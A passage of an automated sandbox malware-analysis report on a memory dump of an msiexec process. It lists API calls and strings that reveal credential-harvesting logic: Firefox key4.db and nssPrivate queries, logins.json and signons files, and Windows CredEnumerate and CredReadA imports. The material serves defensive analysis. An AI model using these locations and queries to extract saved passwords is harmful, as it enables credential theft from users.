                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                                                            • String ID:
                                                                                                            • API String ID: 2998058495-0
                                                                                                            • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                            • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                                                            • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                                                            • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                                                            APIs
                                                                                                            • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                            • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                                                            • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                                                            • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                                                            • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                                                            • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcmp$memcpy
                                                                                                            • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                                                            • API String ID: 231171946-2189169393
                                                                                                            • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                            • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                                                            • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                                                            • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                                                            • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                            • API String ID: 633282248-1996832678
                                                                                                            • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                            • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                                                            • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                                                            • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00406782
                                                                                                              • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                              • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                                                            • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                                                            • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                                                            • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                                                            • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                                                            • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                                                            • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                                                            • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                                                            • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                                                            • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                                                            • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                                                            • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                                                            Strings
                                                                                                            • key4.db, xrefs: 00406756
                                                                                                            • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                                                            • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                                                            • , xrefs: 00406834
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpy$memcmp$memsetstrlen
                                                                                                            • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                            • API String ID: 3614188050-3983245814
                                                                                                            • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                            • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                                                            • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                                                            • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040A973
                                                                                                            • memset.MSVCRT ref: 0040A996
                                                                                                            • memset.MSVCRT ref: 0040A9AC
                                                                                                            • memset.MSVCRT ref: 0040A9BC
                                                                                                            • sprintf.MSVCRT ref: 0040A9F0
                                                                                                            • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                                                            • sprintf.MSVCRT ref: 0040AABE
                                                                                                            • _mbscat.MSVCRT ref: 0040AAED
                                                                                                              • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                                                            • sprintf.MSVCRT ref: 0040AB21
                                                                                                              • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                              • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                                                            • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                            • API String ID: 710961058-601624466
                                                                                                            • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                            • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                                                            • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                                                            • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: sprintf$memset$_mbscpy
                                                                                                            • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                            • API String ID: 3402215030-3842416460
                                                                                                            • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                            • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                                                            • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                                                            • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                                                            APIs
                                                                                                              • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                                                              • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                                                              • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                                                              • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                                                              • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                                                              • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                              • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                              • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                                                            • strlen.MSVCRT ref: 0040F139
                                                                                                            • strlen.MSVCRT ref: 0040F147
                                                                                                            • memset.MSVCRT ref: 0040F187
                                                                                                            • strlen.MSVCRT ref: 0040F196
                                                                                                            • strlen.MSVCRT ref: 0040F1A4
                                                                                                            • memset.MSVCRT ref: 0040F1EA
                                                                                                            • strlen.MSVCRT ref: 0040F1F9
                                                                                                            • strlen.MSVCRT ref: 0040F207
                                                                                                            • _strcmpi.MSVCRT ref: 0040F2B2
                                                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                                                            • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                                                              • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                              • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                                                            • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                                                            • API String ID: 2003275452-3138536805
                                                                                                            • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                            • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                                                            • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                                                            • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040C3F7
                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                                                            • strrchr.MSVCRT ref: 0040C417
                                                                                                            • _mbscat.MSVCRT ref: 0040C431
                                                                                                            • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                                                            • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                                                            • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                                                            • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                                                            • API String ID: 1012775001-1343505058
                                                                                                            • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                            • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                                                            • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                                                            • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00444612
                                                                                                              • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                            • strlen.MSVCRT ref: 0044462E
                                                                                                            • memset.MSVCRT ref: 00444668
                                                                                                            • memset.MSVCRT ref: 0044467C
                                                                                                            • memset.MSVCRT ref: 00444690
                                                                                                            • memset.MSVCRT ref: 004446B6
                                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                              • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                            • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                              • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                              • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                            • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                                                            • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcpymemset$strlen$_mbscpy
                                                                                                            • String ID: salu
                                                                                                            • API String ID: 3691931180-4177317985
                                                                                                            • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                            • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                                                            • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                                                            • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                                                            • API String ID: 2449869053-232097475
                                                                                                            • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                            • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                                                            • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                                                            • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                                                            APIs
                                                                                                            • sprintf.MSVCRT ref: 0040957B
                                                                                                            • LoadMenuA.USER32(?,?), ref: 00409589
                                                                                                              • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                                                              • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                                                              • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                                                              • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                                                            • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                                                            • sprintf.MSVCRT ref: 004095EB
                                                                                                            • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                                                            • memset.MSVCRT ref: 0040961C
                                                                                                            • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                                                            • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                                                                                            • DestroyWindow.USER32(00000000), ref: 0040965C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                            • String ID: caption$dialog_%d$menu_%d
                                                                                                            • API String ID: 3259144588-3822380221
                                                                                                            • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                            • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                                                                                            • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                                                                                            • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                            • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                            • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                            • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                            • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$Library$FreeLoad
                                                                                                            • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                            • API String ID: 2449869053-4258758744
                                                                                                            • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                            • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                                            • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                                            • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                                            APIs
                                                                                                            • wcsstr.MSVCRT ref: 0040426A
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                                            • _mbscpy.MSVCRT(?,?), ref: 004042D5
                                                                                                            • _mbscpy.MSVCRT(?,?,?,?), ref: 004042E8
                                                                                                            • strchr.MSVCRT ref: 004042F6
                                                                                                            • strlen.MSVCRT ref: 0040430A
                                                                                                            • sprintf.MSVCRT ref: 0040432B
                                                                                                            • strchr.MSVCRT ref: 0040433C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                            • String ID: %s@gmail.com$www.google.com
                                                                                                            • API String ID: 3866421160-4070641962
                                                                                                            • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                            • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                                            • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                                            • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                                            APIs
                                                                                                            • _mbscpy.MSVCRT(0045A448,?), ref: 00409749
                                                                                                            • _mbscpy.MSVCRT(0045A550,general,0045A448,?), ref: 00409759
                                                                                                              • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                              • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                              • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                                            • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                                            • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                                            • _mbscpy.MSVCRT(0045A550,strings), ref: 004097A1
                                                                                                            • memset.MSVCRT ref: 004097BD
                                                                                                            • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                              • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                            • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                            • API String ID: 1035899707-3647959541
                                                                                                            • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                            • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                                            • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                                            • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                                            APIs
                                                                                                            • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                                                                                            • SelectObject.GDI32(?,?), ref: 0040CACC
                                                                                                            • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                                                                                            • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                                                                                              • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                                                                                              • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                                                                                              • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                                                                                            • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                                                                                            • SetCursor.USER32(00000000), ref: 0040CB35
                                                                                                            • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                                                                                            • SetFocus.USER32(?), ref: 0040CB92
                                                                                                            • SetFocus.USER32(?), ref: 0040CC0B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                            • String ID:
                                                                                                            • API String ID: 1416211542-0
                                                                                                            • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                            • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                                                                                            • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                                                                                            • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
